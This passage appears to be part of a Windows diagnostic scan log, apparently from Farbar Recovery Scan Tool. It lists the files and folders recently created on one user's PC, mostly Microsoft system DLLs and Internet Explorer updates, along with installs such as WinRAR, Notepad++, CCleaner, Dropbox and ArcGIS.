2017-04-03 15:53 - 2017-01-18 17:36 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-conio-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-utility-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-locale-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-environment-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-2-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-1.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l2-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-timezone-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l2-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:36 - 00011608 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-2-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00922432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00066400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-private-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00022368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-math-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00019808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-multibyte-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-string-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-stdio-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00016224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-runtime-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00015712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-convert-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00014176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-time-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00014176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-2-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00013664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-filesystem-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-process-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-heap-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-conio-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-utility-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-locale-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-environment-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-2-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-1.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l2-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-timezone-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l2-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-2-0.dll
2017-04-03 15:52 - 2015-12-16 20:53 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\kbdgeoqw.dll
2017-04-03 15:52 - 2015-12-16 20:53 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZEL.DLL
2017-04-03 15:52 - 2015-12-16 20:53 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZE.DLL
2017-04-03 15:52 - 2015-12-16 20:48 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZE.DLL
2017-04-03 15:52 - 2015-12-16 20:48 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kbdgeoqw.dll
2017-04-03 15:52 - 2015-12-16 20:48 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZEL.DLL
2017-04-03 14:02 - 2017-04-03 14:02 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\WinRAR
2017-04-03 13:22 - 2017-04-04 16:30 - 00000000 ____D C:\Users\Tesla\Data
2017-04-03 13:12 - 2017-04-03 13:12 - 00000980 _____ C:\ProgramData\Microsoft\Windows\Start Menu\WinRAR.lnk
2017-04-03 13:12 - 2017-04-03 13:12 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-04-03 13:12 - 2017-04-03 13:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-04-03 13:11 - 2017-04-03 13:26 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Notepad++
2017-04-03 13:11 - 2017-04-03 13:12 - 00000000 ____D C:\Program Files\WinRAR
2017-04-03 13:11 - 2017-04-03 13:11 - 00002782 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
2017-04-03 13:11 - 2017-04-03 13:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++
2017-04-03 13:11 - 2017-04-03 13:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2017-04-03 13:11 - 2017-04-03 13:11 - 00000000 ____D C:\Program Files\CCleaner
2017-04-03 13:11 - 2017-04-03 13:11 - 00000000 ____D C:\Program Files (x86)\Notepad++
2017-04-03 09:54 - 2017-04-03 09:54 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\IrfanView
2017-04-03 09:24 - 2017-04-03 09:24 - 00000000 ____D C:\Users\Tesla\AppData\Local\Hewlett-Packard_Developme
2017-03-31 16:07 - 2017-04-09 22:52 - 00000000 ____D C:\Users\Tesla\AppData\LocalLow\Mozilla
2017-03-31 16:06 - 2017-03-31 16:07 - 00000000 ____D C:\Users\Tesla\AppData\Local\Mozilla
2017-03-31 16:06 - 2017-03-31 16:06 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Mozilla
2017-03-31 16:02 - 2017-03-31 16:02 - 00000000 ____D C:\Users\Tesla\AppData\LocalLow\Adobe
2017-03-31 16:02 - 2017-03-31 16:02 - 00000000 ____D C:\Users\Tesla\AppData\Local\CEF
2017-03-31 16:02 - 2017-03-31 16:02 - 00000000 ____D C:\Users\Tesla\AppData\Local\Adobe
2017-03-31 15:58 - 2017-03-31 16:09 - 00001998 ____H C:\Users\Tesla\Documents\Default.rdp
2017-03-31 12:00 - 2017-03-31 12:00 - 00963232 _____ (Microsoft Corporation) C:\Windows\system32\msvcr120.dll
2017-03-31 12:00 - 2017-03-31 12:00 - 00660128 _____ (Microsoft Corporation) C:\Windows\system32\msvcp120.dll
2017-03-31 12:00 - 2017-03-31 12:00 - 00356528 _____ (Microsoft Corporation) C:\Windows\system32\vccorlib120.dll
2017-03-22 19:47 - 2017-03-22 19:47 - 00045672 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-stable.sys
2017-03-22 19:47 - 2017-03-22 19:47 - 00045672 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-dev.sys
2017-03-22 19:47 - 2017-03-22 19:47 - 00045672 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-canary.sys
2017-03-20 08:55 - 2017-03-20 08:55 - 00000000 ____D C:\Users\Tesla\OpenVPN
2017-03-20 08:45 - 2017-03-20 08:45 - 00000000 ____D C:\Users\Tesla\AppData\Local\FME Desktop Help
2017-03-20 08:44 - 2017-03-20 08:45 - 00000000 ____D C:\Users\Tesla\Documents\ArcGIS
2017-03-20 08:44 - 2017-03-20 08:45 - 00000000 ____D C:\Users\Tesla\AppData\Local\ESRI
2017-03-20 08:44 - 2017-03-20 08:44 - 00000000 ____D C:\Users\Tesla\Documents\FME
2017-03-20 08:44 - 2017-03-20 08:44 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Safe Software
2017-03-20 08:44 - 2017-03-20 08:44 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\ESRI
2017-03-20 08:44 - 2017-03-20 08:44 - 00000000 ____D C:\Users\Tesla\AppData\Local\Safe Software
2017-03-20 08:43 - 2017-04-10 19:28 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Skype
2017-03-20 08:43 - 2017-03-20 08:43 - 00000000 ____D C:\Users\Tesla\Tracing
2017-03-20 08:38 - 2017-03-20 08:38 - 00000000 ____D C:\Users\Tesla\AppData\Local\FreeCommanderXE
2017-03-20 08:35 - 2017-03-20 08:35 - 00000020 ___SH C:\Users\Administrator.CEDA\ntuser.ini
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\Šablony
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\Soubory cookie
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\Poslední
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\Okolní tiskárny
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\Okolní síť
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\Nabídka Start
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\Dokumenty
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\Documents\Obrázky
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\Documents\Hudba
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\Documents\Filmy
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\Data aplikací
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\AppData\Roaming\Microsoft\Windows\Start Menu\Programy
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\AppData\Local\Data aplikací
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 ____D C:\Users\Administrator.CEDA
2017-03-20 08:35 - 2017-03-04 19:24 - 00394448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-03-20 08:35 - 2017-03-04 18:39 - 00346320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2017-03-20 08:35 - 2017-03-04 10:20 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2017-03-20 08:35 - 2017-03-04 10:20 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2017-03-20 08:35 - 2017-03-04 10:02 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2017-03-20 08:35 - 2017-03-04 10:01 - 00576512 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-03-20 08:35 - 2017-03-04 10:01 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2017-03-20 08:35 - 2017-03-04 10:01 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-03-20 08:35 - 2017-03-04 10:01 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2017-03-20 08:35 - 2017-03-04 09:59 - 02895360 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-03-20 08:35 - 2017-03-04 09:52 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2017-03-20 08:35 - 2017-03-04 09:51 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2017-03-20 08:35 - 2017-03-04 09:48 - 25746944 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-03-20 08:35 - 2017-03-04 09:46 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2017-03-20 08:35 - 2017-03-04 09:45 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2017-03-20 08:35 - 2017-03-04 09:45 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2017-03-20 08:35 - 2017-03-04 09:45 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-03-20 08:35 - 2017-03-04 09:44 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-03-20 08:35 - 2017-03-04 09:36 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2017-03-20 08:35 - 2017-03-04 09:32 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2017-03-20 08:35 - 2017-03-04 09:31 - 06045696 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-03-20 08:35 - 2017-03-04 09:23 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2017-03-20 08:35 - 2017-03-04 09:21 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2017-03-20 08:35 - 2017-03-04 09:16 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2017-03-20 08:35 - 2017-03-04 09:16 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-03-20 08:35 - 2017-03-04 09:13 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-03-20 08:35 - 2017-03-04 09:11 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2017-03-20 08:35 - 2017-03-04 08:57 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-03-20 08:35 - 2017-03-04 08:55 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-03-20 08:35 - 2017-03-04 08:54 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-03-20 08:35 - 2017-03-04 08:52 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-03-20 08:35 - 2017-03-04 08:52 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2017-03-20 08:35 - 2017-03-04 08:26 - 15259648 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-03-20 08:35 - 2017-03-04 08:25 - 03241984 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-03-20 08:35 - 2017-03-04 08:12 - 01545728 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-03-20 08:35 - 2017-03-04 08:02 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-03-20 08:35 - 2017-03-04 06:18 - 20281856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2017-03-20 08:35 - 2017-03-02 20:16 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2017-03-20 08:35 - 2017-03-02 20:02 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2017-03-20 08:35 - 2017-03-02 20:01 - 00499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2017-03-20 08:35 - 2017-03-02 20:01 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2017-03-20 08:35 - 2017-03-02 20:01 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2017-03-20 08:35 - 2017-03-02 20:00 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2017-03-20 08:35 - 2017-03-02 19:55 - 02287104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2017-03-20 08:35 - 2017-03-02 19:54 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2017-03-20 08:35 - 2017-03-02 19:53 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2017-03-20 08:35 - 2017-03-02 19:51 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2017-03-20 08:35 - 2017-03-02 19:50 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2017-03-20 08:35 - 2017-03-02 19:49 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2017-03-20 08:35 - 2017-03-02 19:49 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2017-03-20 08:35 - 2017-03-02 19:41 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2017-03-20 08:35 - 2017-03-02 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2017-03-20 08:35 - 2017-03-02 19:35 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2017-03-20 08:35 - 2017-03-02 19:32 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2017-03-20 08:35 - 2017-03-02 19:31 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2017-03-20 08:35 - 2017-03-02 19:29 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2017-03-20 08:35 - 2017-03-02 19:28 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2017-03-20 08:35 - 2017-03-02 19:22 - 04604416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2017-03-20 08:35 - 2017-03-02 19:21 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2017-03-20 08:35 - 2017-03-02 19:19 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2017-03-20 08:35 - 2017-03-02 19:17 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2017-03-20 08:35 - 2017-03-02 19:17 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2017-03-20 08:35 - 2017-03-02 19:11 - 13654528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2017-03-20 08:35 - 2017-03-02 18:53 - 02767360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2017-03-20 08:35 - 2017-03-02 18:50 - 01312768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2017-03-20 08:35 - 2017-03-02 18:50 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2017-03-20 08:35 - 2017-02-23 01:42 - 00084712 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2017-03-20 08:35 - 2017-02-23 01:37 - 01285632 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2017-03-20 08:35 - 2017-02-18 16:05 - 01609216 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2017-03-20 08:35 - 2017-02-18 16:05 - 00646656 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2017-03-20 08:35 - 2017-02-11 17:58 - 00462848 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2017-03-20 08:35 - 2017-02-11 17:58 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2017-03-20 08:35 - 2017-02-11 17:58 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2017-03-20 08:35 - 2017-02-10 18:32 - 00803328 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2017-03-20 08:35 - 2017-02-10 18:32 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2017-03-20 08:35 - 2017-02-10 18:17 - 00628736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usp10.dll
2017-03-20 08:35 - 2017-02-10 18:17 - 00312832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2017-03-20 08:35 - 2017-02-10 16:33 - 01251328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2017-03-20 08:35 - 2017-02-09 18:36 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2017-03-20 08:35 - 2017-02-09 18:35 - 05548264 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-03-20 08:35 - 2017-02-09 18:35 - 00706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2017-03-20 08:35 - 2017-02-09 18:35 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2017-03-20 08:35 - 2017-02-09 18:35 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2017-03-20 08:35 - 2017-02-09 18:33 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00040960 _____ (Microsoft Corporation) C:\Windows\system32\WcsPlugInService.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 01460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00625664 _____ (Microsoft Corporation) C:\Windows\system32\mscms.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00250880 _____ (Microsoft Corporation) C:\Windows\system32\icm32.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
